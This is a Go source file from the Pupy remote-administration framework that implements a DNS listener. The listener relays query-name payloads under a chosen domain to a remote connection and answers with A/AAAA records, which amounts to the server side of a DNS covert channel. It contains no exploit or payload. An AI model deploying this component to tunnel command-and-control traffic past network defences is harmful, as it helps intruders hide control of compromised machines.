pupy/services/proxy/dns.go

470 lines
9.3 KiB
Go

package main
import (
"fmt"
"net"
"strings"
"sync/atomic"
"time"
"errors"
dns "github.com/miekg/dns"
rc "github.com/paulbellamy/ratecounter"
log "github.com/sirupsen/logrus"
)
// serveDNS runs a DNSListener for conn/domain until its Serve loop returns.
//
// The listener is published in d.DNSListener (under d.DNSCheck) for the
// duration of the call and set back to nil afterwards. The error returned by
// the listener's Serve is returned unchanged.
func (d *Daemon) serveDNS(conn net.Conn, domain string) error {
	listener := NewDNSListener(conn, domain)

	d.DNSCheck.Lock()
	d.DNSListener = listener
	d.DNSCheck.Unlock()

	log.Debug("DNS: Enabled: ", domain)
	// Serve through the local reference. Re-reading d.DNSListener here without
	// holding DNSCheck would be an unsynchronized read of a field that this
	// function only writes under that lock.
	err := listener.Serve()
	log.Debug("DNS: Disabled: ", domain, err)

	d.DNSCheck.Lock()
	d.DNSListener = nil
	d.DNSCheck.Unlock()
	return err
}
// listenAndServeTCP blocks in the TCP dns server until it stops. It then
// reports ListenAndServe's result (nil or the error) on cherr exactly once.
func (p *DNSListener) listenAndServeTCP(cherr chan error) {
	// Runs after the result has been handed over on cherr.
	defer log.Debug("[1.] DNS TCP CLOSED")

	serveErr := p.TCPServer.ListenAndServe()
	if serveErr != nil {
		log.Error("Couldn't start TCP DNS listener:", serveErr)
	}
	cherr <- serveErr
}
// listenAndServeUDP blocks in the UDP dns server until it stops. It then
// reports ListenAndServe's result (nil or the error) on cherr exactly once.
func (p *DNSListener) listenAndServeUDP(cherr chan error) {
	err := p.UDPServer.ListenAndServe()
	if err != nil {
		// Name the UDP server explicitly. The TCP and UDP servers bind the same
		// address, so the log must say which of the two failed.
		log.Error("Couldn't start UDP DNS listener:", err)
	}
	cherr <- err
	log.Debug("[2.] DNS UDP CLOSED")
}
// messageReader reads response lists from the remote side over p.Conn and
// forwards each one on chmsg.
//
// Every successful read decrements p.pendingRequests. When that count reaches
// zero, the connection deadline is cleared. On the first read error, or a nil
// response, the error (possibly nil) is sent once on cherr. chmsg is then
// closed and the goroutine exits.
func (p *DNSListener) messageReader(cherr chan error, chmsg chan []string) {
	defer log.Debug("[3.] REMOTE READER CLOSED")
	defer close(chmsg)

	for {
		var response []string
		if err := RecvMessage(p.Conn, &response); err != nil || response == nil {
			log.Error("DNS: RecvMessage failed: ", err)
			cherr <- err
			return
		}

		// No more outstanding requests: stop enforcing the per-request deadline.
		if atomic.AddInt32(&p.pendingRequests, -1) == 0 {
			p.Conn.SetDeadline(time.Time{})
		}
		chmsg <- response
	}
}
// responseProcessor pairs each message received from the remote side with the
// next requester channel taken from queue. Channels are consumed in the order
// queryProcessor pushed them, and the response is handed to that requester.
//
// It stops when recvStrings is closed or yields nil, or when queue yields nil.
// It then answers every requester still buffered in queue with an empty slice,
// without blocking once queue is empty.
func (p *DNSListener) responseProcessor(queue chan chan []string, recvStrings chan []string) {
	for response := range recvStrings {
		if response == nil {
			break
		}
		waiter := <-queue
		if waiter == nil {
			break
		}
		waiter <- response
	}

	// Non-blocking drain of requesters that will never get a real answer.
	for draining := true; draining; {
		select {
		case waiter := <-queue:
			if waiter != nil {
				waiter <- []string{}
			} else {
				draining = false
			}
		default:
			draining = false
		}
	}
	log.Debug("[5.] RESPONSE PROCESSOR CLOSED")
}
// sendEmptyMessage writes an empty message to the remote side over p.Conn.
// This is best-effort: the send error is intentionally discarded.
func (p *DNSListener) sendEmptyMessage() {
	_ = SendMessage(p.Conn, "")
}
// queryProcessor forwards DNS requests received on p.DNSRequests to the remote
// side over p.Conn as "<type>:<name>" messages. For each sent request it pushes
// the requester's IPs channel onto queue, so responseProcessor can pair replies
// with requesters in send order.
//
// The first time interrupt fires or p.DNSRequests yields nil, it sends true on
// closeNotify and closes it. A failed send, or exceeding 512 outstanding
// requests, is reported on decoderr.
//
// Any of these events switches the processor into "ignore" mode. From then on,
// requests are answered with an empty slice until the wait yields no request,
// at which point the loop exits. Requests already waiting on p.DNSRequests are
// then drained with empty answers.
func (p *DNSListener) queryProcessor(
	queue chan chan []string,
	interrupt <-chan bool, closeNotify chan<- bool, decoderr chan<- error) {
	ignore := false
	notifySent := false
	for {
		var r *DNSRequest
		interrupted := false
		log.Debug("DNS. Wait for interrupt or for close request")
		select {
		case r = <-p.DNSRequests:
		case <-interrupt:
			interrupted = true
		}
		log.Debug("DNS. Wait done: ", r, ignore)

		if r == nil || interrupted {
			if interrupted {
				log.Error("DNS: Interrupt request received", notifySent)
			}
			if !notifySent {
				log.Debug("Send close notify")
				closeNotify <- true
				notifySent = true
				close(closeNotify)
			}
			log.Debug("Ignore 1")
			ignore = true
		}

		if ignore {
			if r == nil {
				break
			}
			r.IPs <- []string{}
			continue
		}

		// Reserve a pending slot BEFORE anything goes on the wire. Otherwise an
		// over-limit request would already have been sent while its IPs channel
		// is never queued, leaving its reply with no requester to deliver to.
		// Counting first also stops messageReader from seeing the count drop to
		// zero (and clearing the deadline) while this request is outstanding.
		if atomic.AddInt32(&p.pendingRequests, 1) > 512 {
			atomic.AddInt32(&p.pendingRequests, -1)
			r.IPs <- []string{}
			decoderr <- errors.New("Too many pending requests")
			ignore = true
			continue
		}

		p.Conn.SetDeadline(time.Now().Add(20 * time.Second))
		if err := SendMessage(p.Conn, r.Type+":"+r.Name); err != nil {
			// No reply will come for this request; release its slot.
			atomic.AddInt32(&p.pendingRequests, -1)
			log.Error("DNS: Send message failed: ", err)
			r.IPs <- []string{}
			decoderr <- err
			ignore = true
			continue
		}
		queue <- r.IPs
	}

waitLoop:
	for {
		select {
		case r := <-p.DNSRequests:
			// A nil value means the channel is closed: nothing left to drain.
			// Without this break a closed channel would make the loop spin.
			if r == nil {
				break waitLoop
			}
			r.IPs <- []string{}
		default:
			break waitLoop
		}
	}
	log.Debug("[4.] Message processor closed")
}
// warnSlow logs a warning of the form "<message>: <seconds>s" (two decimals)
// when strictly more than max has elapsed since now. Otherwise it logs nothing.
func warnSlow(message string, now time.Time, max time.Duration) {
	elapsed := time.Since(now)
	if elapsed <= max {
		return
	}
	log.Warningf("%s: %.2fs", message, elapsed.Seconds())
}
// ServeDNS is the dns.Handler used by both the UDP and TCP servers created in
// NewDNSListener.
//
// For every question in r:
//   - The trailing root dot is stripped. The part of the name before "."+p.Domain
//     is the payload forwarded to the remote side.
//   - A/AAAA questions are answered from p.DNSCache when an entry exists. Entries
//     idle for more than a minute are purged at the start of every call.
//   - A cache miss whose name ends in p.Domain, while the listener is active,
//     queues a DNSRequest on p.DNSRequests. The handler then blocks until a list
//     of IP strings arrives on the per-call result channel. Non-empty answers
//     are turned into A/AAAA records (TTL 60) and cached under "<qtype>:<qname>".
//
// Other question types, names outside p.Domain and empty answers produce no
// answer records. Each question is handled independently, and the reply is
// always written.
func (p *DNSListener) ServeDNS(w dns.ResponseWriter, r *dns.Msg) {
	m := new(dns.Msg)
	m.SetReply(r)
	m.Compress = true
	m.Authoritative = false

	now := time.Now()
	// One channel per call. Each DNSRequest submitted by this handler receives
	// exactly one []string on it.
	result := make(chan []string)

	p.dnsRequestsCounter.Incr(1)
	defer p.dnsProcessedRequestsCounter.Incr(1)
	// Serve waits on processedRequests before closing p.DNSRequests.
	p.processedRequests.Add(1)
	defer p.processedRequests.Done()
	defer close(result)

	// Drop cache entries that have not been used for a minute.
	p.cacheLock.Lock()
	for k, v := range p.DNSCache {
		if v.LastActivity.Add(1 * time.Minute).Before(now) {
			log.Debug("Delete cache: ", k)
			delete(p.DNSCache, k)
		}
	}
	p.cacheLock.Unlock()

	for _, q := range r.Question {
		// TrimSuffix also copes with an empty name. Indexing q.Name[len(q.Name)-1]
		// would panic on one.
		question := strings.TrimSuffix(q.Name, ".")
		payloadLen := len(question) - len(p.Domain) - 1
		if payloadLen < 0 {
			payloadLen = 0
		}

		qtype := dns.Type(q.Qtype).String()
		log.Debug("DNS: Request: ", qtype, " ", q.Name)

		// Only A/AAAA are looked up in the cache and forwarded. Every other type
		// keeps this empty record and so gets no answers.
		record := &DNSCacheRecord{}
		ok := true
		cacheKey := ""
		if q.Qtype == dns.TypeA || q.Qtype == dns.TypeAAAA {
			cacheKey = qtype + ":" + q.Name
			p.cacheLock.Lock()
			record, ok = p.DNSCache[cacheKey]
			p.cacheLock.Unlock()
		}

		if !ok {
			log.Info("DNS: Request: ", q.Name, " not in cache; PL: ", payloadLen)

			var responses []string
			// NOTE(review): p.active is read without activeLock. Do not simply take
			// the lock here: Shutdown holds it while stopping the dns servers, which
			// may wait for in-flight handlers (verify against miekg/dns).
			if strings.HasSuffix(question, p.Domain) && p.active {
				p.dnsRemoteRequestsCounter.Incr(1)
				payload := question[:payloadLen]
				sentAt := time.Now()
				p.DNSRequests <- &DNSRequest{
					Name: payload,
					Type: qtype,
					IPs:  result,
				}
				log.Debug("DNS: Send request: ", payload)
				responses = <-result
				log.Info("DNS: Response: ", payload, ": ", responses)
				warnSlow(fmt.Sprintf(
					"DNS: Slow RR communication: (Rates: Remote=%dps Total=%dps Processed=%dps)",
					p.dnsRemoteRequestsCounter.Rate()/10,
					p.dnsRequestsCounter.Rate()/10,
					p.dnsProcessedRequestsCounter.Rate()/10,
				), sentAt, 1*time.Second)
			}

			if len(responses) == 0 {
				// Nothing to answer or cache for this question. Later questions
				// are still processed.
				continue
			}

			dnsResponses := make([]dns.RR, len(responses))
			for i, response := range responses {
				header := dns.RR_Header{
					Name:   q.Name,
					Rrtype: q.Qtype,
					Class:  dns.ClassINET,
					Ttl:    60,
				}
				// net.ParseIP returns nil for malformed strings. The record then
				// carries an empty address.
				switch q.Qtype {
				case dns.TypeA:
					dnsResponses[i] = &dns.A{
						Hdr: header,
						A:   net.ParseIP(response).To4(),
					}
				case dns.TypeAAAA:
					dnsResponses[i] = &dns.AAAA{
						Hdr:  header,
						AAAA: net.ParseIP(response).To16(),
					}
				}
			}

			// Set LastActivity before publishing. A concurrent purge must not
			// see a zero timestamp and evict the entry immediately.
			record = &DNSCacheRecord{
				ResponseRecords: dnsResponses,
				LastActivity:    now,
			}
			p.cacheLock.Lock()
			p.DNSCache[cacheKey] = record
			p.cacheLock.Unlock()
		}

		m.Answer = append(m.Answer, record.ResponseRecords...)

		// Refresh under cacheLock: the purge loop reads LastActivity under the
		// same lock from other handlers.
		p.cacheLock.Lock()
		record.LastActivity = now
		p.cacheLock.Unlock()
	}

	w.WriteMsg(m)
}
// NewDNSListener builds a DNSListener bound to conn for the given domain.
//
// It prepares, but does not start, UDP and TCP dns servers on
// ExternalBindHost:DnsBindPort. The listener itself is the handler for both
// (see ServeDNS). It also creates an empty response cache, the request
// channel, and 10-second rate counters, and marks the listener active.
func NewDNSListener(conn net.Conn, domain string) *DNSListener {
	// JoinHostPort brackets IPv6 literals ("[::]:53"). "%s:%d" would produce
	// ":::53", which the net package cannot split back into host and port.
	addr := net.JoinHostPort(ExternalBindHost, fmt.Sprint(DnsBindPort))

	listener := &DNSListener{
		Conn:     conn,
		Domain:   domain,
		DNSCache: make(map[string]*DNSCacheRecord),
		UDPServer: &dns.Server{
			Addr:    addr,
			Net:     "udp",
			UDPSize: int(UDPSize),
		},
		TCPServer: &dns.Server{
			Addr: addr,
			Net:  "tcp",
		},
		DNSRequests:                 make(chan *DNSRequest),
		dnsRequestsCounter:          rc.NewRateCounter(10 * time.Second),
		dnsRemoteRequestsCounter:    rc.NewRateCounter(10 * time.Second),
		dnsProcessedRequestsCounter: rc.NewRateCounter(10 * time.Second),
		active:                      true,
	}
	listener.UDPServer.Handler = listener
	listener.TCPServer.Handler = listener
	return listener
}
// Serve runs the listener until all of its workers have stopped.
//
// It starts five goroutines: the TCP and UDP dns servers, the remote
// messageReader, the queryProcessor and the responseProcessor. It then waits
// for events from them. Every event triggers Shutdown, so the first failure
// (or close) tears the whole listener down. The events are:
//   - a server returning;
//   - a decoder error;
//   - the remote reader failing, which also interrupts queryProcessor;
//   - the query processor's close notification.
//
// The loop exits once the TCP server, the UDP server, the remote reader and the
// query processor have all reported. Serve then waits for in-flight ServeDNS
// handlers and closes p.DNSRequests.
//
// It returns the first non-nil error reported by any worker, or nil.
func (p *DNSListener) Serve() error {
	tcperr := make(chan error)
	udperr := make(chan error)
	decoderr := make(chan error)
	recvStrings := make(chan []string)
	recvErrors := make(chan error)
	closeNotify := make(chan bool)
	interruptNotify := make(chan bool)
	responsesQueue := make(chan chan []string, 512)

	defer close(tcperr)
	defer close(udperr)
	defer close(decoderr)
	defer close(recvErrors)
	defer close(responsesQueue)

	go p.listenAndServeTCP(tcperr)
	go p.listenAndServeUDP(udperr)
	go p.messageReader(recvErrors, recvStrings)
	go p.queryProcessor(responsesQueue, interruptNotify, closeNotify, decoderr)
	go p.responseProcessor(responsesQueue, recvStrings)

	var err error
	tcpClosed := false
	udpClosed := false
	decoderClosed := false
	msgsClosed := false
	shutdown := false
	for !(tcpClosed && udpClosed && decoderClosed && msgsClosed) {
		var err2 error
		select {
		case err2 = <-tcperr:
			log.Println("Recv tcpClosed")
			tcpClosed = true
		case err2 = <-udperr:
			log.Println("Recv udpClosed")
			udpClosed = true
		case err2 = <-decoderr:
			log.Println("Recv decoderErr")
		case err2 = <-recvErrors:
			log.Println("Recv msgsClosed")
			msgsClosed = true
			close(interruptNotify)
		case <-closeNotify:
			log.Println("Recv decoderClosed")
			shutdown = true
			decoderClosed = true
			// queryProcessor closes closeNotify right after its single send. A
			// closed channel is always ready in a select, so without this the
			// loop would keep re-entering this case and busy-spin. Receiving
			// from a nil channel blocks forever, which disables the case.
			closeNotify = nil
		}
		log.Debug("Call closed")
		p.Shutdown()
		log.Debug("Call closed complete")
		if err == nil {
			err = err2
		}
		log.Debug("CLOSED: ", tcpClosed, udpClosed, decoderClosed, msgsClosed, shutdown)
	}

	log.Debug("Wait process group complete")
	p.processedRequests.Wait()
	log.Debug("Wait process group complete - done")
	close(p.DNSRequests)
	p.DNSRequests = nil
	return err
}
// Shutdown stops the UDP and TCP dns servers and closes the remote connection.
//
// Only the first call does any work, because it clears p.active. activeLock
// serializes concurrent callers. Errors from the individual shutdown/close
// calls are not inspected.
func (p *DNSListener) Shutdown() {
	p.activeLock.Lock()
	defer p.activeLock.Unlock()

	if !p.active {
		return
	}
	p.active = false

	p.UDPServer.Shutdown()
	p.TCPServer.Shutdown()
	p.Conn.Close()
	log.Debug("CLOSING DNS REQUESTS")
	log.Debug("DNS REQUESTS CLOSED")
}